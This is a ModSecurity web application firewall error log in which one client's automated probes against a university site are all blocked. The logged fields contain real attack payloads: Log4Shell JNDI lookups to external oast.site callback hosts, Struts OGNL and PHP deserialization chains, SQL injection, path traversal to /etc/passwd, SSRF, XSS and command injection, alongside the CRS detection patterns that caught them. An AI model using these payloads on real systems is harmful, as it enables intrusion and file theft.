[Tue Aug 29 11:35:02.349027 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAASPDNIAAAAS"]
[Tue Aug 29 11:35:03.321391 2023] [:error] [pid 1268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAAT0eC4AAAAy"]
[Tue Aug 29 11:35:03.345478 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAATXLMoAAAAb"]
[Tue Aug 29 11:35:03.346407 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAUXLkEAAABM"]
[Tue Aug 29 11:35:04.333586 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlgb7nnd5wayr7qi.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11eMCo-f0AAAUNalkAAABF"]
[Tue Aug 29 11:35:04.339873 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAAUdm4oAAABS"]
[Tue Aug 29 11:35:05.301218 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlg1t9ue5ahhid4e.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAASOUqIAAAAR"]
[Tue Aug 29 11:35:06.346812 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg39kni14p36snj.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlg39kni14p36snj.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAATavvkAAAAg"]
[Tue Aug 29 11:35:07.344115 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAAUZcGkAAABO"]
[Tue Aug 29 11:35:07.349610 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAAVPX3QAAAAF"]
[Tue Aug 29 11:35:08.363518 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAATUxSYAAAAW"]
[Tue Aug 29 11:35:09.340563 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAAUNal8AAABF"]
[Tue Aug 29 11:35:10.333458 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAASEJY8AAAAE"]
[Tue Aug 29 11:35:10.355836 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAAUXLkcAAABM"]
[Tue Aug 29 11:35:10.361633 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fsCo-f0AAAVPX3gAAAAF"]
[Tue Aug 29 11:35:12.365066 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gMCo-f0AAAUZcG8AAABO"]
[Tue Aug 29 11:35:12.394712 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAUKhBcAAABC"]
[Tue Aug 29 11:35:12.453699 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAT9PQUAAAA1"]
[Tue Aug 29 11:35:12.704509 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAT9PQUAAAA1"]
[Tue Aug 29 11:35:13.400530 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAAVWQAUAAAAV"]
[Tue Aug 29 11:35:14.295785 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAAShCbYAAAAi"]
[Tue Aug 29 11:35:14.335891 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAAVWQAgAAAAV"]
[Tue Aug 29 11:35:15.935753 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "digilibfh.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11g8Co-f0AAATOA-UAAAAH"]
[Tue Aug 29 11:35:16.333444 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAAVRxd8AAAAQ"]
[Tue Aug 29 11:35:16.364383 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAAT9PQYAAAA1"]
[Tue Aug 29 11:35:16.405031 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "digilibfh.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAAT9PQcAAAA1"]
[Tue Aug 29 11:35:18.472351 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAAPLwLoAAAAX"]
[Tue Aug 29 11:35:18.503934 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAAVvlGwAAAAe"]
[Tue Aug 29 11:35:19.303456 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11h8Co-f0AAATPtUsAAAAM"]
[Tue Aug 29 11:35:20.429196 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:vars[1][]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:vars[1][]: vars[1][]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11iMCo-f0AAASHh-IAAAAD"]
[Tue Aug 29 11:35:21.339929 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11icCo-f0AAAVPX4cAAAAF"]
